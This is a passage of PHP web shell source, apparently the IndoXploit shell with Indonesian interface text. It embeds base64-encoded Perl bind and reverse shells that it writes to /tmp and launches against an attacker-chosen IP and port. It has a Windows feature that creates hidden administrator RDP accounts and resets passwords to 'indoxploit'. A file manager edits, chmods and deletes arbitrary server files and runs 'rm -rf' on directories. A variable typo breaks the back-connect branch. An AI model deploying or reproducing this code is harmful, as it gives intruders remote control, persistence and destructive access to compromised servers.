2370.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2371.     if(isset($_POST['sub_bp'])) {
2372.         $f_bp = fopen("/tmp/bp.pl", "w");
2373.         fwrite($f_bp, base64_decode($bind_port_p));
2374.         fclose($f_bp);
2375.  
2376.         $port = $_POST['port_bind'];
2377.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2378.         sleep(1);
2379.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2380.         unlink("/tmp/bp.pl");
2381.     }
2382.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2383.     if(isset($_POST['sub_bc'])) {
2384.         $f_bc = fopen("/tmp/bc.pl", "w");
2385.         fwrite($f_bc, base64_decode($bind_connect_p));
2386.         fclose($f_bc);
2387.  
2388.         $ipbc = $_POST['ip_bc'];
2389.         $port = $_POST['port_bc'];
2390.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2391.         sleep(1);
2392.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2393.         unlink("/tmp/bc.pl");
2394.     }
2395. } elseif($_GET['do'] == 'krdp_shell') {
2396.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
2397.         if($_POST['create']) {
2398.             $user = htmlspecialchars($_POST['user']);
2399.             $pass = htmlspecialchars($_POST['pass']);
2400.             if(preg_match("/$user/", exe("net user"))) {
2401.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
2402.             } else {
2403.                 $add_user   = exe("net user $user $pass /add");
2404.                 $add_groups1 = exe("net localgroup Administrators $user /add");
2405.                 $add_groups2 = exe("net localgroup Administrator $user /add");
2406.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
2407.                 echo "[ RDP ACCOUNT INFO ]<br>
2408.                 ------------------------------<br>
2409.                 IP: <font color=lime>".$ip."</font><br>
2410.                 Username: <font color=lime>$user</font><br>
2411.                 Password: <font color=lime>$pass</font><br>
2412.                 ------------------------------<br><br>
2413.                 [ STATUS ]<br>
2414.                 ------------------------------<br>
2415.                 ";
2416.                 if($add_user) {
2417.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
2418.                 } else {
2419.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
2420.                 }
2421.                 if($add_groups1) {
2422.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
2423.                 } elseif($add_groups2) {
2424.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
2425.                 } elseif($add_groups3) {
2426.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
2427.                 } else {
2428.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
2429.                 }
2430.                 echo "------------------------------<br>";
2431.             }
2432.         } elseif($_POST['s_opsi']) {
2433.             $user = htmlspecialchars($_POST['r_user']);
2434.             if($_POST['opsi'] == '1') {
2435.                 $cek = exe("net user $user");
2436.                 echo "Checking username <font color=lime>$user</font> ....... ";
2437.                 if(preg_match("/$user/", $cek)) {
2438.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
2439.                     ------------------------------<br><br>
2440.                     <pre>$cek</pre>";
2441.                 } else {
2442.                     echo "[ <font color=red>belum ada</font> ]";
2443.                 }
2444.             } elseif($_POST['opsi'] == '2') {
2445.                 $cek = exe("net user $user indoxploit");
2446.                 if(preg_match("/$user/", exe("net user"))) {
2447.                     echo "[change password: <font color=lime>indoxploit</font>] -> ";
2448.                     if($cek) {
2449.                         echo "<font color=lime>Berhasil</font>";
2450.                     } else {
2451.                         echo "<font color=red>Gagal</font>";
2452.                     }
2453.                 } else {
2454.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2455.                 }
2456.             } elseif($_POST['opsi'] == '3') {
2457.                 $cek = exe("net user $user /DELETE");
2458.                 if(preg_match("/$user/", exe("net user"))) {
2459.                     echo "[remove user: <font color=lime>$user</font>] -> ";
2460.                     if($cek) {
2461.                         echo "<font color=lime>Berhasil</font>";
2462.                     } else {
2463.                         echo "<font color=red>Gagal</font>";
2464.                     }
2465.                 } else {
2466.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
2467.                 }
2468.             } else {
2469.                 //
2470.             }
2471.         } else {
2472.             echo "-- Create RDP --<br>
2473.             <form method='post'>
2474.             <input type='text' name='user' placeholder='username' value='42247551N5' required>
2475.             <input type='text' name='pass' placeholder='password' value='42247551N5' required>
2476.             <input type='submit' name='create' value='>>'>
2477.             </form>
2478.             -- Option --<br>
2479.             <form method='post'>
2480.             <input type='text' name='r_user' placeholder='username' required>
2481.             <select name='opsi'>
2482.             <option value='1'>Cek Username</option>
2483.             <option value='2'>Ubah Password</option>
2484.             <option value='3'>Hapus Username</option>
2485.             </select>
2486.             <input type='submit' name='s_opsi' value='>>'>
2487.             </form>
2488.             ";
2489.         }
2490.     } else {
2491.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2492.     }
2493. } elseif($_GET['act'] == 'newfile') {
2494.     if($_POST['new_save_file']) {
2495.         $newfile = htmlspecialchars($_POST['newfile']);
2496.         $fopen = fopen($newfile, "a+");
2497.         if($fopen) {
2498.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2499.         } else {
2500.             $act = "<font color=red>permission denied</font>";
2501.         }
2502.     }
2503.     echo $act;
2504.     echo "<form method='post'>
2505.     Filename: <input type='text' name='newfile' value='$dir/azx.php' style='width: 450px;' height='10'>
2506.     <input type='submit' name='new_save_file' value='Submit'>
2507.     </form>";
2508. } elseif($_GET['act'] == 'newfolder') {
2509.     if($_POST['new_save_folder']) {
2510.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2511.         if(!mkdir($new_folder)) {
2512.             $act = "<font color=red>permission denied</font>";
2513.         } else {
2514.             $act = "<script>window.location='?dir=".$dir."';</script>";
2515.         }
2516.     }
2517.     echo $act;
2518.     echo "<form method='post'>
2519.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2520.     <input type='submit' name='new_save_folder' value='Submit'>
2521.     </form>";
2522. } elseif($_GET['act'] == 'rename_dir') {
2523.     if($_POST['dir_rename']) {
2524.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2525.         if($dir_rename) {
2526.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2527.         } else {
2528.             $act = "<font color=red>permission denied</font>";
2529.         }
2530.     echo "".$act."<br>";
2531.     }
2532.     echo "<form method='post'>
2533.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2534.     <input type='submit' name='dir_rename' value='rename'>
2535.     </form>";
2536. } elseif($_GET['act'] == 'delete_dir') {
2537.     if(is_dir($dir)) {
2538.         if(is_writable($dir)) {
2539.             @rmdir($dir);
2540.             @exe("rm -rf $dir");
2541.             @exe("rmdir /s /q $dir");
2542.             rmdir($dir);
2543.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2544.         } else {
2545.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
2546.         }
2547.     }
2548.     echo $act;
2549. } elseif($_GET['act'] == 'view') {
2550.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2551.     echo "<fieldset><pre>".htmlspecialchars(@file_get_contents($_GET['file']))."</pre></fieldset>";
2552. }
2553. elseif($_GET['act'] == 'chmod') {
2554. echo "<form method=post><input type='text' name='jmbt' value='".$_GET['file']."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
2555. if($_POST['azztssns']) {
2556. $jmbt = $_POST['jmbt'];
2557. $kntl = $_POST['kntl'];
2558. $cd = @chmod($jmbt,$kntl);
2559.  
2560.  
2561. if(!$cd)
2562. {
2563. echo "<font color=red>ERROR</font><br>";
2564.  
2565. }else
2566. {
2567. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
2568.  
2569. }
2570.  
2571. }
2572. }
2573.  elseif($_GET['act'] == 'edit') {
2574.     if($_POST['save']) {
2575.         $save = file_put_contents($_GET['file'], $_POST['src']);
2576.         if($save) {
2577.             $act = "<font color=lime>Saved!</font>";
2578.         } else {
2579.             $act = "<font color=red>permission denied</font>";
2580.         }
2581.     echo "".$act."<br>";
2582.     }
2583.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2584.     echo "<form method='post'>
2585.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2586.     <input type='submit' value='Save' name='save' style='width: 500px;'>
2587.     </form>";
2588. } elseif($_GET['act'] == 'rename') {
2589.     if($_POST['do_rename']) {
2590.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2591.         if($rename) {
2592.             $act = "<script>window.location='?dir=".$dir."';</script>";
2593.         } else {
2594.             $act = "<font color=red>permission denied</font>";
2595.         }
2596.     echo "".$act."<br>";
2597.     }
2598.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2599.     echo "<form method='post'>
2600.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2601.     <input type='submit' name='do_rename' value='rename'>
2602.     </form>";
2603. } elseif($_GET['act'] == 'delete') {
2604.     $delete = unlink($_GET['file']);
2605.     if($delete) {
2606.         $act = "<script>window.location='?dir=".$dir."';</script>";
2607.     } else {
2608.         $act = "<font color=red>permission denied</font>";
2609.     }
2610.     echo $act;
2611. } else {
2612.     if(is_dir($dir) === true) {
2613.         if(!is_readable($dir)) {
2614.             echo "<font color=red>can't open directory. ( not readable )</font>";
2615.         } else {
2616.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2617.             <tr>
2618.             <th class="th_home"><center>Name</center></th>
2619.             <th class="th_home"><center>Type</center></th>
2620.             <th class="th_home"><center>Size</center></th>
2621.             <th class="th_home"><center>Last Modified</center></th>
2622.             <th class="th_home"><center>Owner/Group</center></th>
2623.             <th class="th_home"><center>Permission</center></th>
2624.             <th class="th_home"><center>Action</center></th>
2625.             </tr>';
2626.             $scandir = scandir($dir);
2627.             foreach($scandir as $dirx) {
2628.                 $dtype = filetype("$dir/$dirx");
2629.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2630.                 if(function_exists('posix_getpwuid')) {
2631.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2632.                     $downer = $downer['name'];
2633.                 } else {
2634.                     //$downer = $uid;
2635.                     $downer = fileowner("$dir/$dirx");
2636.                 }
2637.                 if(function_exists('posix_getgrgid')) {
2638.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2639.                     $dgrp = $dgrp['name'];
2640.                 } else {
2641.                     $dgrp = filegroup("$dir/$dirx");
2642.                 }
2643.                 if(!is_dir("$dir/$dirx")) continue;
2644.                 if($dirx === '..') {
2645.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2646.                 } elseif($dirx === '.') {
2647.                     $href = "<a href='?dir=$dir'>$dirx</a>";
2648.                 } else {
2649.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2650.                 }
2651.                 if($dirx === '.' || $dirx === '..') {
2652.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2653.                     } else {
2654.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2655.                 }
2656.                 echo "<tr>";
2657.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2658.                 echo "<td class='td_home'><center>$dtype</center></td>";
2659.                 echo "<td class='td_home'><center>-</center></th></td>";
2660.                 echo "<td class='td_home'><center>$dtime</center></td>";
2661.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2662.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2663.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2664.                 echo "</tr>";
2665.             }
2666.         }
2667.     } else {
2668.         echo "<font color=red>can't open directory.</font>";
2669.     }
2670.         foreach($scandir as $file) {
2671.             $ftype = filetype("$dir/$file");
2672.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2673.             $size = filesize("$dir/$file")/1024;
2674.             $size = round($size,3);
2675.             if(function_exists('posix_getpwuid')) {
2676.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2677.                 $fowner = $fowner['name'];
2678.             } else {
2679.                 //$downer = $uid;
2680.                 $fowner = fileowner("$dir/$file");
2681.             }
2682.             if(function_exists('posix_getgrgid')) {
2683.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2684.                 $fgrp = $fgrp['name'];
2685.             } else {
2686.                 $fgrp = filegroup("$dir/$file");
2687.             }
2688.             if($size > 1024) {
2689.                 $size = round($size/1024,2). 'MB';
2690.             } else {
2691.                 $size = $size. 'KB';
2692.             }
2693.             if(!is_file("$dir/$file")) continue;
2694.             echo "<tr>";
2695.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2696.             echo "<td class='td_home'><center>$ftype</center></td>";
2697.             echo "<td class='td_home'><center>$size</center></td>";
2698.             echo "<td class='td_home'><center>$ftime</center></td>";
2699.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2700.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2701.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2702.             echo "</tr>";
2703.         }
2704.         echo "</table>";
2705.         if(!is_readable($dir)) {
2706.             //
2707.         } else {
2708.             echo "<hr>";
2709.         }
2710.     echo "<center><font color=lime size=-20>SOURCE CODE FROM : AZZATSSINS, INDOXPLOIT, D'MASTER PIECE, ANONGHOST, GITHUB, IDBTE4M, ELDERSC0D, ETC</font></center>";
2711. }
2712. ?>
2713. </html>